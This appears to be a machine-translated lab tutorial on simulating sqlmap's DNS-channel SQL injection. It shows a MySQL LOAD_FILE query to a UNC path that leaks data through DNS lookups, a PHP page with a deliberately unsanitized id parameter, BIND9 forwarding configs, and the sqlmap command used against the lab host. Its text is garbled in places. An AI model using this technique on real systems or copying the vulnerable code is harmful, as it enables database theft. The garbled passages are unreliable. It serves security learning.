Because see this article of the dark cloud http://drop.xbclub.org/static/drops/tips-5283.html inside the mentioned in the Sqlmap--dns-domain for DNS injection, So you want to simulate a local environment for testing.
First DNS Injection
Mysql> Show variables like '%skip% '; +------------------------+-------+| Variable_name | Value |+------------------------+-------+| Skip_external_locking | On | | skip_name_resolve | OFF | | skip_networking | OFF | | skip_show_database | OFF | | slave_skip_errors | OFF | | sql_slave_skip_counter | 0 |+------------------------+-------+6 rows in Set
Here you can see | Skip_name_resolve | OFF |
Description is available for domain name resolution
So what's the syntax for MySQL to initiate DNS query requests?
Mysql> Select Load_file (' \\\\fdsafdsfdssx.xxxx.com\\1.txt '); +-----------------------------------------------+ | Load_file (' \\\\fdsafdsfdssx.xxxx.com\\1.txt ') |+-----------------------------------------------+| NULL |+-----------------------------------------------+1 row in setmysql> select ' \\\\fdsafdsfdssx.xxxx.com\ \1.txt '; +-------------------------------+| \\fdsafdsfdssx.xxxx.com\1.txt |+-------------------------------+| \\fdsafdsfdssx.xxxx.com\1.txt |+-------------------------------+1 row in SetHere to see \\xxxxx.com\1.txt is not contacted to get the shared file SMB protocol, because this is the domain name, so will initiate DNS query to check the corresponding IP
Then we can think of
To get the data.
Next, the simulation test environment uses the Sqlmap--dns-domain parameter for DNS channel injection
Web server && sqli, Win8, A
B--Ubuntu Sqlmap
BIND9 service, Ubuntu, C
First a run PHP MySQL Apache environment casually write a SQL injection point
<?php$con = mysql_connect ("localhost", "root", "root") or Die (); mysql_select_db ("burp"); $id = $_get[' id ']; $sql = " Select host from Burp where id= ". $id; Digital type//$sql = "Select ' New ' from ' SQL ' where id=". $id. "'"; The character echo $sql; $res = mysql_query ($sql), echo "<br><br>", echo "<b>", while ($rows = Mysql_fetch_array ( $res, MYSQL_ASSOC) { echo $rows [' Host '];} echo "<b>";? >It's a pretty obvious injection point.
B Sqlmap not much to say
C BIND9 Service
Configured as follows
Zone "attaker.com" { type master; File "/etc/bind/zones/attaker.com.db"; }; Zone "whoami.com" { type forward; forwarders {192.168.199.144;}; # b Machine ip};# This was the zone definition for reverse DNS. Replace 0.168.192 with your network address on reverse notation-e.g My network address is 192.168.0zone "199.168.192.in- Addr.arpa "{ type master; File "/etc/bind/zones/rev.199.168.192.in-addr.arpa";};The key point is that forwarded is forwarded to the B machine.
[email protected]:/etc/bind/zones# VI attaker.com.db attaker.com. In SOA ns1.attaker.com. Admin.attaker.com. (2006081401 28800 36 XX 604800 38400) attaker.com. In NS ns1.attaker.com.attaker.com. In MX ten mta.attaker.com. In a 192.168.199.129www in a 192.168.199.129mta in a 192.168.19 9.129ns1 in A 192.168.199.144
[Email protected]:/etc/bind/zones# vi rev.199.168.192.in-addr.arpa @ in SOA ns1.attaker.com. Admin.attaker.com. ( 2006081401; 28800; 604800; 604800; 86400) in NS ns1.attaker.com.1 in PTR attaker.com
This will be configured to start the BIND service.
Then point the WIN8 DNS to the IP of C
Start Sqlmap
Python sqlmap.py-u "http://192.168.199.210/sqli.php?id=5000"--tech "B"--dns-domain "whoami.com"--dbs
At the same time B above open tcpdump
[Email protected]:~# tcpdump-i eth0-nt-s port domain |grep whoami
Discover a machine has initiated a DNS request come over
Finally, grab the Sqlmap data with Burp.
Sqlmap--dns-domain Simulation Practice
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
